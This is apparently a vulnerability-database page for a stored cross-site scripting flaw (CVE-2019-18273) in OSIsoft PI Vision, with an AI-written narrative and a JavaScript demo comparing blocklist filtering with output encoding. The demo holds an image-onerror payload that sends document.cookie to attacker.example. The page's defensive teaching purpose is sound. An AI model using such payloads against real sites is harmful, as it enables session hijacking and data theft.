CVE-2019-18273
Description
OSIsoft PI Vision, PI Vision 2017 R2 and PI Vision 2017 R2 SP1. The affected product is vulnerable to cross-site scripting, which may allow invalid input to be introduced.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
OSIsoft PI Vision 2017 R2 and 2017 R2 SP1 contain a cross-site scripting (XSS) flaw. An attacker who already holds a high-privilege PI Vision account can store script in the application that later executes in another administrator's browser session; the CVSS vector rates the resulting loss of confidentiality, integrity and availability as high, so a successful attack can lead to full compromise of the application.
Vulnerability
A cross-site scripting (XSS) vulnerability (CWE-79) exists in OSIsoft PI Vision versions 2017 R2 and 2017 R2 SP1 [1]. The flaw stems from improper neutralization of user-supplied input during web page generation, so a value stored by one user is later emitted into a page as live markup rather than as text. The CVSS v3 base score is 6.4 with the vector (AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H): the attack is launched over the network but requires high attack complexity, high privileges and user interaction, and the scope is unchanged.
Exploitation
An attacker needs a high-privilege PI Vision account (administrative access, per the PR:H metric) and network access to the web application. The attacker places a crafted payload into an input that PI Vision later renders into a page without neutralizing it. When another administrator views that page, or follows a link to it, the script executes in that user's browser with that user's PI Vision session, which is the user interaction the UI:R metric records [1]. The high attack complexity (AC:H) indicates that conditions outside the attacker's control must hold for the attack to succeed; the advisory does not name the affected input.
Impact
Successful exploitation affects confidentiality, integrity and availability, each rated high in the CVSS vector. Because the injected script runs with the victim administrator's session, the attacker can read, modify or delete data and perform any action that administrator is authorised to perform, leading to full compromise of the PI Vision system [1].
Mitigation
The recommended mitigation is to upgrade to PI Vision 2019 or later; those versions are not affected by this vulnerability [1]. No vendor workaround is publicly documented. Where the upgrade cannot be applied immediately, the prerequisites in the CVSS vector point to the compensating controls: limit and audit the high-privilege accounts able to create or edit PI Vision content, since an attacker needs one to plant the payload, and minimise network exposure of the PI Vision web server. Input validation and output encoding are the developer-side fix for CWE-79 and belong in the vendor's rendering code rather than in an operator's configuration. This CVE is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
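The stored-XSS pattern described in the Exploitation and Mitigation sections above, as an added illustration in JavaScript. This is an editorial example, not OSIsoft's code and not a reproduction of the PI Vision flaw; the "display title" field, the sample labels and every function name are constructed for this page. It shows why a blocklist-style input filter is not a substitute for output encoding when fixing CWE-79.

```javascript
// Added illustration of CWE-79, the weakness class behind CVE-2019-18273.
// This is NOT OSIsoft code and does not reproduce the PI Vision flaw; it
// models the scenario the advisory describes: one privileged user stores a
// text value that the application later renders into a page for another user.
// The "display title" field, the sample labels and all names are constructed.

// Constructed inputs: what a legitimate user and an attacker might store.
const CONSTRUCTED_LABEL_BENIGN = "Plant 3 overview";
const CONSTRUCTED_LABEL_MALICIOUS =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Weak control: a blocklist that only strips <script> elements. The payload
// above carries no <script> element, so it passes through untouched.
function stripScriptTags(label) {
  return String(label).replace(/<script[\s\S]*?<\/script>/gi, "");
}

// Vulnerable rendering: raw input concatenated into HTML (improper
// neutralization of input during web page generation).
function renderTitleVulnerable(label) {
  return `<h1 class="display-title">${label}</h1>`;
}

// Hardened rendering: contextual output encoding for the HTML *text* context.
// Encoding is what guarantees the browser treats the value as text; attribute,
// URL and JavaScript contexts each need a different encoder.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

function renderTitleHardened(label) {
  return `<h1 class="display-title">${escapeHtml(label)}</h1>`;
}

// Review check: a browser can only open a new element from a literal "<"
// followed by a tag name, "/" or "!". If the interpolated region still holds
// one, the stored value can change the page structure and run script.
const WRAPPER_OPEN = '<h1 class="display-title">';
const WRAPPER_CLOSE = "</h1>";

function interpolatedRegion(html) {
  if (!html.startsWith(WRAPPER_OPEN) || !html.endsWith(WRAPPER_CLOSE)) {
    throw new Error("unexpected wrapper around rendered title");
  }
  return html.slice(WRAPPER_OPEN.length, html.length - WRAPPER_CLOSE.length);
}

function containsActiveMarkup(html) {
  return /<[a-zA-Z!\/]/.test(interpolatedRegion(html));
}

// Compare the three renderings of one stored value side by side.
function summarize(label = CONSTRUCTED_LABEL_MALICIOUS) {
  return {
    vulnerable: containsActiveMarkup(renderTitleVulnerable(label)),
    blocklistOnly: containsActiveMarkup(renderTitleVulnerable(stripScriptTags(label))),
    hardened: containsActiveMarkup(renderTitleHardened(label)),
  };
}

console.log(JSON.stringify(summarize(), null, 2));
// { "vulnerable": true, "blocklistOnly": true, "hardened": false }
```

Run it with `node`. The summary makes the practical point: a filter aimed at `<script>` leaves the event-handler payload intact, whereas encoding the HTML metacharacters for the text context neutralises whatever was stored, so the value cannot open a new element when another administrator's browser parses the page. The encoder shown covers only the HTML text context; a value placed into an attribute, a URL or inline script needs the encoder for that context.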
Affected products
2 - OSIsoft / PI Vision
Patches
0 - No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
1 - www.us-cert.gov/ics/advisories/icsa-20-014-06 (MITRE, x_refsource_MISC)
News mentions
0 - No linked articles in our index yet.